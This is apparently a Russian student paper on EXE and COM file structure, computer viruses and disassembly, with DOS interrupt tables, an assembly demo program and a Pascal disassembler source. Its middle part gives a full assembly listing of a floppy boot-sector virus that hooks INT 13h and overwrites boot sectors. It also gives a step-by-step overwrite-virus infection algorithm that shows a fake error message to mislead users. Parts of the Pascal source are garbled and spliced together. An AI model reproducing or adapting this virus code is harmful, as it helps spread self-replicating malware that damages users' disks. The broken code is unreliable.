Семантический анализ структуры EXE файла и дисассемблер (с примерами и исходниками), вирусология 
	
	
конкретной причины. 
                        ОСНОВНЫЕ ПОЛОЖЕНИЯ НА ПАМЯТЬ 
-    Объем COM-файла ограничен 64К. 
             -    COM-файл меньше, чем соответствующий EXE-файл. 
-    Программа,  написанная для выполнения  в COM-формате не содержит 
стека и сегмента данных и не  требует инициализации регистра DS. 
-    Программа,  написанная  для  выполнения  в  COM-формате 
      использует  директиву ORG 100H  после директивы SEGMENT для 
выполнения  с  адреса  после  префикса программного сегмента. 
-    Программа  EXE2BIN  преобразует  EXE-файл  в  COM-файл, 
      обусловленный указанием типа COM во втором операнде. 
-    Операционная система DOS определяет  стек  для COM-программы   или 
в конце программы,  если  позволяет размер, или в конце памяти. 
   3. Принцип действия и распространения вируса. 
      Писать вирусы можно  по  разным  причинам.  Кому-то  нравится  изучать 
системные вызовы,  искать  «дыры»  в  антивирусах  и  совершенствовать  свои 
знания в ассемблере,  то  есть  исключительно  программирование.  У  кого-то 
коммерческие или целенаправленные методы. Что же такое вирус ? Вирус  –  это 
творчество, изобретение новых приемов программирования, знание  системы  как 
пяти пальцев. 
       Есть  такая  группа  людей,  кто  стремится  навредить  всем  подряд, 
вставляя  в  свои  вирусы  так  называемую  деструкцию(изменение   различных 
настроек системы компьютера). Такие написанные вирусы-деструкторы,  способны 
стирать FAT-таблицы жестких дисков или даже выжигать монитор. 
       Рассмотрим   вирус,  заражающий  ЕХЕ-файлы.  Приведена  классификация 
таких вирусов, подробно  рассмотрены  алгоритмы  их  работы,  отличия  между 
ними, достоинства и недостатки. 
Вирусы заражающие EXE-файла можно поделить на несколько групп: 
*Я рассматриваю - вирусы написанные в основном  на  ассемблере,  имеющие  не 
большой размер. 
Вирусы, замещающие программный код (Overwrite) 
       Такие  вирусы  уже  давно  устарели  и   в   наши   дни   они   редко 
распространены. 
       Инфицированные программы не исполняются, так как  вирус  записывается 
поверх программного кода, не сохраняя его. При запуске вирус ищет  очередную 
жертву  (или  жертвы),  открывает  найденный  файл  для   редактирования   и 
записывает свое «тело» в начало программы,  не  сохраняя  оригинальный  код. 
Инфицированные этими вирусами программы лечению не подлежат. 
Вирусы-спутники (Companion) 
      Эти вирусы получили  свое  название  из-за  алгоритма  размножения:  К 
каждому  инфицированному  файлу  создается  файл-спутник.  Рассмотрим  более 
подробно два типа вирусов этой группы: 
      Вирусы  первого  типа  размножается  следующим  образом.  Для  каждого 
инфицируемого ЕХЕ-файла в том же каталоге создается файл с  вирусным  кодом, 
имеющий такое же имя, что и ЕХЕ-файл, но с расширением 
СОМ. Вирус активируется, если при запуске программы в командной 
строке указано только имя исполняемого файла. Если СОМ-файл с  таким  именем 
не найден, ведется поиск одноименного ЕХЕ-файла. Если 
не найден и ЕХЕ-файл, DOS попробует обнаружить ВАТ (пакетный) 
файл. Другими словами, когда пользователь хочет за- 
пустить программу и набирает  в  командной  строке  только  ее  имя,  первым 
управление получает вирус, код которого находится в  СОМ-файле.  Он  создает 
СОМ-файл еще к одному или нескольким ЕХЕ-файлам (распространяется), а  затем 
исполняет ЕХЕ-файл с указанным в командной строке  именем.  Пользователь  же 
думает,  что  работает  только   запущенная   ЕХЕ-программа.   Вирус-спутник 
обезвредить довольно просто - достаточно удалить СОМ-файл. 
      Вирусы второго типа действуют более тонко. Имя инфицируемого 
ЕХЕ-файла остается прежним, а расширение заменяется каким-либо 
другим, отличным от исполняемого (СОМ, ЕХЕ и ВАТ), Например, 
файл может получить  расширение  DAT  (файл  данных)  или  OVL  (программный 
оверлей). Затем на место ЕХЕ-файла копируется вирусный 
код. При запуске такой инфицированной программы управление полу- 
чает вирусный код, находящийся в ЕХЕ-файле. Инфицировав еще один 
или несколько ЕХЕ-файлов таким же образом,  вирус  возвращает  оригинальному 
файлу исполняемое расширение (но не ЁХЕ, а СОМ, поскольку ЕХЕ-файл  с  таким 
именем  занят   вирусом),   после   чего   исполняет   его.   Когда   работа 
инфицированной программы закончена, ее 
запускаемому файлу возвращается расширение неисполняемого.  Лечение  файлов, 
зараженных вирусом этого типа, может быть затруднено, 
если вирус-спутник шифрует часть или все тело инфицируемого файла, 
а перед исполнением его расшифровывает. 
Вирусы, внедряющиеся в программу (Parasitic) 
Вирусы этого вида самые  незаметные:  их  код  записывается  в  инфицируемую 
программу, что существенно затрудняет лечение зараженных файлов.  Рассмотрим 
методы внедрения ЕХЕ-вирусов в ЕХЕ-файл. 
Способы заражения ЕХЕ-файлов 
      Самый распространенный способ  заражения  ЕХЕ-файлов  такой:  в  конец 
файла дописывается тело вируса, а заголовок  корректируется  (с  сохранением 
оригинального) так, чтобы при запуске инфицированного файла 
управление получал вирус. Похоже на заражение СОМ-файлов, но вместо  задания 
в коде перехода в начало вируса корректируется собственно 
адрес точки запуска программы. После окончания работы вирус берет из 
сохраненного заголовка оригинальный адрес запуска  программы,  прибавляет  к 
его сегментной компоненте  значение  регистра  DS  или  ES  (полученное  при 
старте вируса) и передает управление на полученный адрес. 
      Второй способ таков - внедрение вируса в начало файла со сдвигом  кода 
программы. Механизм заражения такой: тело инфицируемой программы 
считывается в память, на ее место записывается вирусный код, а после 
него - код инфицируемой программы. Таким образом, код программы 
как бы "сдвигается" в файле на длину кода вируса. Отсюда и название 
способа - "способ сдвига". При запуске инфицированного файла вирус 
заражает еще один или несколько файлов. После этого он считывает 
в память код программы, записывает его в специально созданный на 
диске временный файл с расширением исполняемого файла (СОМ или 
ЕХЕ), и  затем  исполняет  этот  файл.  Когда  программа  закончила  работу, 
временный  файл  удаляется.  Если  при  создании   вируса   не   применялось 
дополнительных приемов защиты, то вылечить инфицированный 
файл очень просто - достаточно удалить код вируса в начале файла, 
и программа снова будет работоспособной. Недостаток этого метода 
в том, что приходится считывать в память весь код инфицируемой про- 
граммы (а ведь бывают экземпляры размером больше 1Мбайт). 
      Следующий способ заражения файлов - метод переноса который    является 
самым совершенным из всех ранее перечисленных. Вирус 
размножается следующим образом: при запуске  инфицированной  программы  тело 
вируса из нее считывается в память. Затем ведется поиск 
неинфицированной программы. В память считывается ее начало, 
по длине равное телу вируса. На это место записывается тело вируса. 
Начало программы из памяти  дописывается  в  конец  файла.  Отсюда  название 
метода - "метод переноса". После того, как вирус инфицировал 
один или несколько файлов, он приступает к исполнению программы, 
из  которой  запустился.  Для  этого  он  считывает  начало   инфицированной 
программы, сохраненное в конце файла,  и  записывает  его  в  начало  файла, 
восстанавливая работоспособность программы. Затем вирус удаляет  код  начала 
программы  из  конца  файла,  восстанавливая  оригинальную  длину  файла,  и 
исполняет программу. После завершения программы вирус вновь записывает  свой 
код в начало файла, а оригинальное начало программы - в конец. Этим  методом 
могут быть инфицированы даже  антивирусы,  которые  проверяют  свой  код  на 
целостность, так как запускаемая вирусом программа имеет  в  точности  такой 
же код, как и до инфицирования. 
Рассмотрим алгоритм распространения Вируса. 
Overwrite-вирус: 
1. Открыть файл, из которого вирус получил управление. 
2. Считать в буфер код вируса. 
3. Закрыть файл. 
4. Искать по маске подходящий для заражения файл. 
5. Если файлов больше не найдено, перейти к пункту 11. 
6. Открыть найденный файл. 
7. Проверить, не заражен ли найденный файл этим вирусом. 
8. Если файл заражен, перейти к пункту 10. 
9. Записать в начало файла код вируса. 
10. Закрыть файл (по желанию можно заразить от одного до всех фай- 
лов в каталоге или на диске). 
11. Выдать на экран какое-либо сообщение об ошибке, например 
"Abnormal program termination" или "Not enough memory", - как бы, пусть 
пользователь не слишком удивляется тому, что программа не запустилась. 
12. Завершить программу. 
       В  большинстве  случаев  для  написания  вируса  широко  используются 
функции DOS-а. Их достаточно много  всех  не  будем  рассматривать,  приведу 
пример только одного из них. 
DOS, функция 21h 
Считать произвольную запись файла 
Вход: 
AH-21h 
DS:DX - адрес открытого FCB (Таблица Б-2) 
Выход: 
AL=OOh, если чтение было успешным и DTA заполнена данными 
AL°01h, если достигнут конец файла (EOF) и чтения не было 
AL=02h, если произошел выход за сегмент (чтения нет) 
AL°03h, если встречен EOF и усеченная запись дополнена нулями 
Описание. 
Данная функция читает из файла с текущей позиции как с указанной в полях 
FCB "Запись с текущей позиции" и "Номер записи при непосредственном доступе 
к файлу". 
Другие функции: 
DOS, функция OOh 
Завершить программу 
DOS, функция 01h 
Считать со стандартного устройства ввода 
DOS, функция 02h 
Записать в стандартное устройство вывода 
DOS, функция 03h 
Считать символа со стандартного вспомогательного устройства 
DOS, функция 04h 
Записать символ в стандартное вспомогательное устройство 
DOS, функция 05h 
Вывести на принтер 
DOS, функция 06h 
Консольный ввод-вывод 
DOS, функция 09h 
Запись строки на стандартный вывод 
DOS, функция OAh 
Ввод строки в буфер 
DOS, функция ODh 
Сброс диска 
 DOS, функция OEh 
Установить текущий диск DOS 
DOS, функция 13h 
Удалить файл через FCB 
DOS, функция 15h 
Последовательная запись в файл через FCB 
DOS, функция 17h 
Переименовать файл через FCB 
DOS, функция 22h 
Писать произвольную запись файла 
DOS, функция 26h 
Создать новый PSP 
DOS, функция 27h 
Читать произвольный блок файла 
DOS, функция 28h 
Писать произвольный блок файла 
DOS, функция 31h 
Завершиться и остаться резидентным 
DOS, функция 3Ah 
Удалить оглавление 
DOS, функция 41h 
Удалить файл 
DOS, функция 43h 
Установить/опросить атрибуты файла 
DOS, функция 44h 
Управление устройством ввода/вывода 
DOS, функция 4Bh 
Выполнить или загрузить программу 
DOS, функция 4Ch 
Завершить программу 
DOS, функция 57h 
Установить/опросить дату/время файла 
DOS, функция 5Ah 
Создать уникальный временный файл 
DOS, функция 68h 
Завершить файл. 
Список наиболее часто используемых функций DOS.(ассемблер пример) 
[AK]  Вот список функций, которые важно помнить при разработке     вирусов: 
      Установить адрес DTA. 
      ~~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 1Ah 
            ds:dx      = адрес 
      выход: 
            нет 
      Получить адрес DTA. 
      ~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 2Fh 
      выход: 
            es:bx      = текущий адрес 
      Create - Создать файл. 
      ~~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 3Ch 
            cx   = атрибуты файла (таб 1) 
            ds:dx      = путь и имя файла в формате asciz 
      выход: 
            if CF=0 then 
              ax = дескриптор файла 
            else 
              ax = код ошибки (3,4,5) (таб 2) 
      Open - Открыть существующий файл 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 3Dh 
            al   = режим доступа (таб 2) 
            cx   = атрибуты 
            ds:dx      = имя 
      выход: 
            if CF=0 then 
              ax = дескриптор файла 
            else 
              ax = код ошибки (1,2,3,4,5,0C) 
      Close - Закрыть файл 
      ~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 3Eh 
            bx   = дескриптор 
            ds:dx      = имя 
      выход: 
            if CF=0 then 
              ax = 
            else 
              ax = код ошибки (6) 
      Read - Чтение из файла 
      ~~~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 3Fh 
            bx   = дескриптор 
            cx   = число байт 
            ds:dx      = буфер для чтения 
      выход: 
            if CF=0 then 
              ax = число прочитанных байт 
                   Это значение может быть меньше CX. 
                   Например потому, что превысили длину файла. 
            else 
              ax = код ошибки (5,6) 
      Write - Записать в файл 
      ~~~~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 40h 
            bx   = дескриптор 
            cx   = число байт 
            ds:dx      = данные для записи 
      выход: 
            if CF=0 then 
              ax = число записанных байт 
            else 
              ax = код ошибки (5,6) 
      Unlink - Удалить файл 
      ~~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 41h 
            cx   = атрибуты 
            ds:dx      = имя 
      выход: 
            if CF=0 then 
              ax = 
            else 
              ax = код ошибки (2,3,5) 
      LSeek - Установить указатель в файле 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 42h 
            al   = точка отсчета указателя: 
                   0 - от начала файла 
                   1 - от текущего положения 
                   2 - от конца 
            bx   = дескриптор 
            cx:dx      = смещение (cx=старшие 16 бит, dx=младшие) 
      выход: 
            if CF=0 then 
              dx:ax    = новое положение указателя относительно начала 
            else 
              ax = код ошибки (1,6) 
      Получить атрибуты файла 
      ~~~~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ax   = 4300h 
            ds:dx      = имя 
      выход: 
            if CF=0 then 
              cx = атрибуты 
            else 
              ax = код ошибки (1,2,3,5) 
      Chmod - Установить атрибуты файла 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ax   = 4301h 
            cx   = новые атрибуты 
            ds:dx      = имя 
      выход: 
            if CF=0 then 
              ax = 
            else 
              ax = код ошибки (1,2,3,5) 
      Выделить блок памяти 
      ~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 48h 
            bx   = размер блока в параграфах 
      выход: 
            if CF=0 then 
              ax = сегмент блока 
            else 
              ax = код ошибки (7,8) 
              bx = размер наибольшего доступного блока 
      Освободить память 
      ~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 49h 
            es   = сегмент блока 
      выход: 
            if CF=0 then 
              ax = 
            else 
              ax = код ошибки (7,9) 
      Изменить размер блока памяти 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 4Ah 
            bx   = новый размер 
            es   = сегмент 
      выход: 
            if CF=0 then 
              ax = 
            else 
              ax = код ошибки (7,8,9) 
              bx = размер наибольшего доступного блока 
      Exec - загрузить или выполнить программу. 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      вход: 
            ah   = 4Bh 
            al   = тип загрузки: 
                 0 - загрузить и выполнить 
                 1 - загрузить и не выполнять 
                 3 - загрузить оверлей 
                 4 - загрузить и выполнить в фоновом режиме (dos 4.0) 
            es:bx      = блок параметров (таб 3) 
            ds:dx      = имя программы 
      выход: 
            if CF=0 then 
              bx,dx разрушены 
            else 
              ax = код ошибки (1,2,5,8,0A,0B) 
Пример элементарного BOOT-вируса: 
      .286 
      .model tiny 
      .code 
      org 00h 
start:      jmp install 
;jmp fkс 
table:                            ; А вот тут будет таблица диска 
      org 4ch                     ; много места ей, но... 
fkс:  nop                   ; 
      xor di,di             ; обнулим их 
      mov ds,di             ; DS=0 
      cli                   ; 
      mov ss,di             ; SS=0 
      mov si,7c00h                ; SI - адрес в памяти, там мы 
                            ; начинаемся. 
      mov bx,si             ; запомним это... еще пригодится 
      mov sp,si 
      sti 
      dec word ptr ds:[0413h]     ; стока памяти дос 
      mov ax,ds:[0413h]           ; в АХ размер дос-памяти в килобайтах 
      mov cl,06             ; чтобы получить сегмент надо число 
      shl ax,cl             ; килобайт умножить на 40h 
                            ; немного арифметики - сегмент считают 
                            ; от начала памяти в параграфах, пара- 
                            ; граф=10h байт, 40h параграфов=400h 
                            ; байт=1кБт. дальше все ясно. 
      mov es,ax             ; ES=адрес нового сегмента 
      push ax                     ; в стек его - будем делать переход 
      mov ax,offset inst_int           ; на это вот смещение 
      push ax                     ; и его в стек тоже 
      mov cx,200h                 ; но сперва надо перенести свое тело 
      cld                   ; в этот вот сегмент 
      rep movsb             ; переносим 
      retf                  ; переход через стек 
inst_int:                   ; здесь мы уже в новом сегменте 
      mov ax,ds:[13h*4]           ; INT 0E0h=INT 13h original 
      mov ds:[0e0h*4],ax          ; 
      mov ax,ds:[13h*4+2]         ; 
      mov ds:[0e0h*4+2],ax        ; 
      mov word ptr ds:[13h*4],offset int13   ; INT 13h=наш обработчик 
      mov ds:[13h*4+2],cs         ; 
      xor cx,cx 
      push cx                     ; снова подготовка к переходу 
      push bx                     ; через стек в точку 0000:7C00h 
      mov es,cx 
      mov ax,0201h                ; читать нормальный бут-сектор 
      mov cx,cs:floppy_sect       ; вот отсюда его и читать 
      mov dh,cs:floppy_head       ; 
      xor dl,dl             ; с диска А: естественно 
      int 0e0h              ; вызов оригинального INT 13h 
run_boot: 
      retf                  ; запустить бут. 
;------  *** Hаш обработчик INT 13h ***  ------- 
int13:  mov cs:shit,ax            ; сохраним ax 
      int 0e0h              ; выполним операцию 
      jnc int_continue      ; если была ошибка уходим 
      jmp int_exit 
int_continue: 
      pushf            ; флаги запомнить надо! 
      cmp byte ptr cs:[shit+1],2  ; reading sectors? 
      jnz g1 
      cmp cx,0001 
      jne g1 
      cmp dh,0              ; читаем бут 
      jne g1 
      cmp dl,01             ; не с винта надеюсь? 
      jna fkс_boot 
g1:   jmp get_out 
;------------- Обработчик чтения бута с дискеты --------------- 
fkс_boot: 
      pusha 
      push ds es 
      push es 
      pop ds 
      lea di,fkс       ; сравним то что у нас по смещению fkс 
      mov ax,cs:[di]        ; с тем что мы прочитали по тому же смещению 
      mov si,bx        ; Так мы проверяем заражен ли 
      add si,offset fkс     ; уже нами бут-сектор 
      cmp ax,[si]           ; 
      jz exit_boot_work     ; если нет то уйдем отсюда 
      cmp dl,1         ; на всякий пожарный :) В принципе можете 
      ja exit_boot_work     ; эту проверку выкинуть - она уже была 
find_place:            ; поиск места куда прятать старый бут-сектор 
      mov ax,[bx+16h]       ; ax=число секторов в FAT 
      mul byte ptr [bx+10h] ; умножим его на число FAT 
      add ax,[bx+0eh]       ; прибавим число резервных секторов для FAT-- 
      push dx               ; запомним dx - там номер диска и сторона   | 
      mov cl,4         ;                              | 
      mov dx,[bx+11h]       ; dx=число элементов корневого каталога     | 
                       ; 1 элемент занимает 32 байта             | 
      shr dx,cl        ; поделим его на 16 - получим число сектров | 
                       ; корня, вроде бы так...             | 
      add ax,dx        ; прибавим к AX------------------------------ 
      dec ax                ; уменьшим на 1 
                       ; в AX порядковый номер последнего сектора 
                       ; ROOT'a... ??? 
      mov cx,[bx+18h]       ; cx=число секторов на дорожке 
      push cx               ; запомним его 
      shl cx,1         ; умножим на 2 
      xor dx,dx        ; dx=0 
      div cx                ; поделим DX:AX на CX 
      pop cx                ; вытащим CX из стека - там число секторов на 
                       ; дорожке было 
      push ax               ; запомним частное от предыдущего деления 
      mov ax,dx        ; в AX занесем остаток от деления 
      xor dx,dx        ; DX=0 
      div cx                ; поделим еще раз 
      mov dh,al        ; DH=номер головки 
      mov cl,dl        ; CL=номер сектора 
      pop ax                ; выкинем AX 
      mov ch,al        ; CH=номер дорожки 
      inc cl                ; прибавим к нему 1 
      pop ax                ; AX=бывшее DX - там была сторона и номер 
                       ; дисковода 
      mov dl,al        ; номер в DL 
      mov cs:floppy_sect,cx ; то что получилось запомним 
      mov cs:floppy_head,dh 
;---------all found dh,cx rules--------- 
      mov ax,0301h          ; записать старый бут куда надо 
      int 0e0h 
      jc exit_boot_work     ; если была ошибка - прекратить работу 
                       ; чтобы не убить диск совсем 
                       ; можно этого и не делать, едва ли что 
                       ; случится - вероятность того что вычисленный 
                       ; нами сектор BAD очень низка, но... 
      push cs 
      pop es 
      lea di,table          ; скопируем из бута в свое тело таблицу 
      mov si,bx        ; параметров диска 
      add si,offset table   ; 
      mov cx,4ch-3          ; 
      rep movsb        ; 
      push cs 
      pop es 
      mov ax,0301h          ; запишемся в бут-сектор 
      xor bx,bx 
      mov cx,0001 
      xor dh,dh 
      int 0e0h 
exit_boot_work: 
      pop es ds        ; восстановим все что убили 
      popa 
get_out: 
      popf             ; и флаги обязательно 
int_exit: 
      retf 2                ; выход из прерывания 
;-------------data block-------------- 
floppy_sect dw 2f08h 
floppy_head db 01 
shit        dw 0 
      org 510 
sign        dw 0aa55h  ; чтобы не выдавали сообщения NDD и прочие... 
                       ; это просто метка системного сектора 
; -----   Инсталлятор вируса в бут дискеты   ----- 
install: 
      mov cs:[0000],4aebh 
      mov byte ptr cs:[0002],090h ; нужная команда 
      push ds 
      xor ax,ax 
      mov ds,ax 
      mov ax,ds:[13h*4] 
      mov ds:[0e0h*4],ax 
      mov ax,ds:[13h*4+2] 
      mov ds:[0e0h*4+2],ax 
      mov word ptr ds:[13h*4],offset int13 
      mov ds:[13h*4+2],cs 
      pop ds 
      push cs 
      pop es 
      mov ax,0201h 
      mov cx,0001 
      mov dx,0000 
      mov bx,offset our_buffer 
      int 13h 
      xor ax,ax 
      mov ds,ax 
      mov ax,ds:[0e0h*4] 
      mov ds:[13h*4],ax 
      mov ax,ds:[0e0h*4+2] 
      mov ds:[13h*4+2],ax 
      mov ax,4c00h 
      int 21h 
our_buffer: 
      end start 
Существуют очень много вирусов, под разные операционные системы, имеющие 
различные цели, написанные на разных языках высокого и низкого уровней. 
МЕТОДЫ БОРЬБЫ С ВИРУСАМИ. 
      Почему-то многие считают, что антивирус может обнаружить любой  вирус, 
то есть, запустив антивирусную программу или монитор, можно  быть  абсолютно 
уверенным в их надежности. Дело в том, что антивирус - это  тоже  программа, 
конечно, написанная профессионалом. Но эти программы  способны  распознавать 
и  уничтожать  только  известные  вирусы.  На  100%  защититься  от  вирусов 
практически невозможно (как если  бы,   пользователь  меняется  дискетами  с 
друзьями, а также получает информацию  из  других  источников,  например  из 
сетей). Если же не вносить информацию в компьютер извне, заразиться  вирусом 
невозможно - сам он ни когда не родится. 
      Наиболее широкое распространение по борьбе с вирусами  получили  такие 
программы как DrWeb и AVP. Благодаря своим новейшим  детекторам,  они  могут 
обнаружить любые вирусы - как самые старые, так и  только  что  появившиеся. 
Всегда нужно проверять файлы, попадающие на компьютер. Любой  из  них  может 
быть заражен  вирусом,  это  нужно  помнить.  Стараться  никогда  не  давать 
работать посторонним на вашем компьютере - именно они 
чаще всего приносят вирусы. Особое внимание следует уделять играм - 
чаще всего вирусы  распространяются  именно  так.  Новые  игры  и  программы 
всегда нужно проверять на вирус. 
4. Дисассемблер 
       Когда  готовый  программный  продукт,  можно   будет   редактировать, 
переделывать по своему желанию, увидеть исходное написанной программы –  это 
называется дисассемблированием. 
Существуют  множество  готовых  программ-дисассемблеров,  такие  как:   Hex- 
редакторы, Win32Dasm, DASM v3, Dasm048 (для  486  процессоров),  DASM6208  и 
т.д. Но недостатки всех этих дисассемблеров в том что  в  них  не  указывают 
например  директивы (Директивы  этой  группы  предназначены  для  управления 
видом файла листинга. Все директивы являются парными  —  это  означает,  что 
если одна директива что-то разрешает, то  другая,  наоборот,  запрещает),  а 
так же все они не способны полностью восстановить исходное программы.  Чтобы 
вносить изменения в программу нужны достаточно хорошие знания ассемблера. 
6. Программы 
1)  Программы выполненная на ассемблере. Запустив программу можно вводит до 
256 символов и одновременно выводить на экран(аналогичность команды DOS- 
“copy con”). Выход клавишей ENTER. Здесь так же можно изменять вид экрана, 
цветовую палитру, прокрутку экрана, размер курсора. 
page 60,132  ;Вывод символа и его скэн кода 
   model small 
  title Пробная программа 
sseg segment para private 'stack' 
       dw 32 dup('??') 
sseg ends 
dseg segment para private 'data' 
    maska  db   30h 
    KSIM DB 3 
    ROW  DB 0 
    COL  DB 0 
    SIM DB  ' ' 
    SCAN DB  ' ' 
    CHISLO DB '   ' 
    STRSIM DB 100 DUP(' ') 
dseg ends 
 cseg segment para private 'code' 
       assume ss:sseg,ds:dseg,cs:cseg,es:nothing 
  sum  proc far    ;Начало программы 
       push ds 
       sub ax,ax 
       push ax 
       mov ax,dseg 
       mov ds,ax 
MOV AH,00H ;Установка 64-цветного режима 
INT 10H 
MOV AX,0600H ;Полная прокрутка экрана 
MOV BH,07 
MOV CX,0000 
MOV DX,184FH 
INT 10H 
MOV AH,01     ; Установка размера курсора 
MOV CH,06 
MOV CL,07 
INT 10H 
MOV KSIM,0 
MOV ROW,00    ; Задание начальных значении 
MOV COL,00 
MOV SI,0 
MOV KSIM,10 
M: 
MOV AH,02; Установка курсора 
MOV BH,00 
MOV DH,ROW 
MOV DL,COL 
INT 10H 
MOV AH,00            ;Ввод символа с клавиатуры 
INT 16H 
MOV STRSIM[SI],AL 
SUB AH,28            ; KLAVISHA ENTER  (exit) 
JZ M1                ;Переход если ноль 
MOV AH,09H           ; Вывод очередного символа в позицию курсора 
MOV AL,STRSIM[SI] 
MOV BH,00 
MOV BL,212 
MOV CX,1 
INT 10H 
ADD COL,1 
ADD SI,1 
INC KSIM 
JMP  M                 ;Безусловный переход 
M1: 
       ret       ; Возврат из подпрограммы(RET-optional pop-value) 
  sum  endp 
  cseg ends 
       end sum 
2) Исходник программы дисассемблер выполненный на паскале: 
---------- include file IO.INC ---- CUT HERE FOR IO.INC ------------- 
 procedure WriteHex(B: byte); 
  const 
     Hex: ARRAY [0 .. 15] OF CHAR = '0123456789ABCDEF'; 
  var 
     i: integer; 
  begin 
    for i:= 1 downto 0 do 
       write(Hex[((B shr (i shl 2)) and $000F)]) 
  end; 
 procedure WritelnHex(B: byte); 
  begin 
    WriteHex(B); 
    writeln 
  end; 
 procedure WriteHexInt(N: integer); 
  begin 
    WriteHex(N shr 8); 
    WriteHex(N and $00FF) 
  end; 
 procedure WritelnHexInt(N: integer); 
  begin 
    WriteHex(N shr 8); 
    WritelnHex(N and $00FF) 
  end; 
 procedure WriteAddress(N, M: integer); 
  begin 
    WriteHexInt(N); 
    Write(':'); 
    WriteHexInt(M) 
  end; 
 procedure HexString(var Str; N: INTEGER); 
  const 
     Hex: ARRAY [0 .. 15] OF CHAR = '0123456789ABCDEF'; 
  var 
     i: byte; 
  begin 
    for i:= 0 to Mem[Seg(Str):Ofs(Str)] - 1 do 
      Mem[Seg(Str):(Ofs(Str)+Mem[Seg(Str):Ofs(Str)]-i)] := 
      Ord(Hex[((N shr (i shl 2)) and $000F)]) 
  end; 
 procedure WriteDouble(High, Low: INTEGER); 
 type 
   LongInt = ARRAY [0..3] OF BYTE; 
 const 
   Divisors : ARRAY [0..9] OF LongInt    = ( (  0,   0,   0,   1), 
                                             (  0,   0,   0,  $A), 
                                             (  0,   0,   0, $64), 
                                             (  0,   0,   3, $E8), 
                                             (  0,   0, $27, $10), 
                                             (  0,   1, $86, $A0), 
                                             (  0,  $F, $42, $40), 
                                             (  0, $98, $96, $80), 
                                             (  5, $F5, $E1,   0), 
                                             ($3B, $9A, $CA,   0)  ); 
 var 
   i, j       : INTEGER; 
   CharOffset, 
   Digit      : BYTE; 
   Rep        : ARRAY [0..9] OF CHAR; 
   Number     : LongInt absolute Low; 
   OldNumber  : LongInt; 
   stop       : BOOLEAN; 
 begin 
   CharOffset := Ord(' '); 
   OldNumber := Number; 
   Rep := '          '; 
   for i:=9 downto 0 do begin 
     Digit := 0; 
     Number := OldNumber; 
     stop := false; 
     repeat 
       (* subtract Divisor from TestNumber *) 
        for j:=0 to 3 do begin 
          Number[j] := Number[j] - Divisors[i][3-j]; 
          if (Number[j] > OldNumber[j]) AND (j<>3) then 
              Number[j+1] := number[j+1] - 1; 
        end; 
       if (Number[3] \io.inc *) 
(*$I \sort.box *) 
  const 
   SymbolTableSize = 2000; 
  type 
   TableEntry = RECORD 
                  offset, 
                  reference : INTEGER; 
                  reftype   : ReferenceTypes; 
                  position  : BYTE 
                END; 
  var 
   SymbolTable, 
   AuxTable      : ARRAY [0 .. SymbolTableSize] OF TableEntry; 
   Current_SymbolTable_Index, 
   Symbol_Table_Length, 
   SortInputIndex, 
   SortOutputIndex, 
   SortStatus                  : INTEGER; 
(* TOOLBOX SORT interface *) 
  procedure Inp; 
  begin 
    while SortInputIndex < Symbol_Table_Length do begin 
      SortRelease(SymbolTable[SortInputIndex]); 
      SortInputIndex := succ(SortInputIndex) 
    end; 
  end; 
  procedure Outp; 
  begin 
    while (NOT SortEOS) AND (SortOutputIndex  blank) AND (Line[CharPos] <> tab) 
*) 
        (*        AND (Line[CharPos] <> semicolon) ) 
*) 
        (*        AND (CharPos  blank)                          *) 
        (*         AND (Line[CharPos] <> tab)                            *) 
        (*         AND (Line[CharPos] <> comma)                          *) 
        (*         AND (Line[CharPos] <> semicolon)                      *) 
        (*         AND (CharPos  Length(Line)  )          *) 
        (* remark: this function should perhaps be inline             *) 
        if CharPos > Ord(Line[0]) then Stop := true 
        else if Line[CharPos] = semicolon then begin 
                                           Stop := true; 
                                           Result.Comment := CharPos 
                                         end 
             else Stop := false 
      end; 
      function Appropriate: BOOLEAN; 
      (* Find out whether the current line should be parsed *) 
      var 
        k: INTEGER; 
      begin 
        CharPos := 1; 
        if (Length(Line) semicolon then begin 
            Appropriate := true; 
            if Line[k] = colon then begin 
              CharPos := k + 1; 
            end 
          end else begin 
            Appropriate := false; 
            Result.Comment := k 
          end 
        end 
      end; 
    begin (* ParseLine *) 
      with Result do begin 
        TypeOverride := None; 
        Offset[0]    := Chr(0); 
        HexCode[0]   := Chr(0); 
        OpCode[0]    := Chr(0); 
        Operand1[0]  := Chr(0); 
        Operand2[0]  := Chr(0); 
        Comment := Ord(Line[0]) + 1; 
        if NOT Appropriate then goto EndParseLine; 
        SkipBT; if Stop then goto EndParseLine; 
        k := CharPos; 
        SkipUBT; 
      (*  Offset := Copy(Line, k, CharPos-k); *) 
        Offset[0] := Chr(CharPos-k); 
        Move(Line[k], Offset[1], CharPos-k); 
        SkipBT; if Stop then goto EndParseLine; 
        k := CharPos; 
        SkipUBT; 
        (* HexCode := Copy(Line, k, CharPos-k); *) 
        HexCode[0] := Chr(CharPos-k); 
        Move(Line[k], HexCode[1], CharPos-k); 
        SkipBT; if Stop then goto EndParseLine; 
        k := CharPos; 
        SkipUBT; 
      (*  OpCode := Copy(Line, k, CharPos-k); *) 
        OpCode[0] := Chr(CharPos-k); 
        Move(Line[k], OpCode[1], CharPos-k); 
        SkipBT; if Stop then goto EndParseLine; 
        (* at first operand *) 
        k := CharPos; 
        SkipUBTC; 
      (*  Operand1 := Copy(Line, k, CharPos-k); *) 
        Operand1[0] := Chr(CharPos-k); 
        Move(Line[k], Operand1[1], CharPos-k); 
        case Operand1[1] of 
        'B': if Operand1 = 'BYTE' then begin 
               TypeOverride := B; 
               SkipBT; if Stop then goto EndParseLine; 
               SkipUBT; 
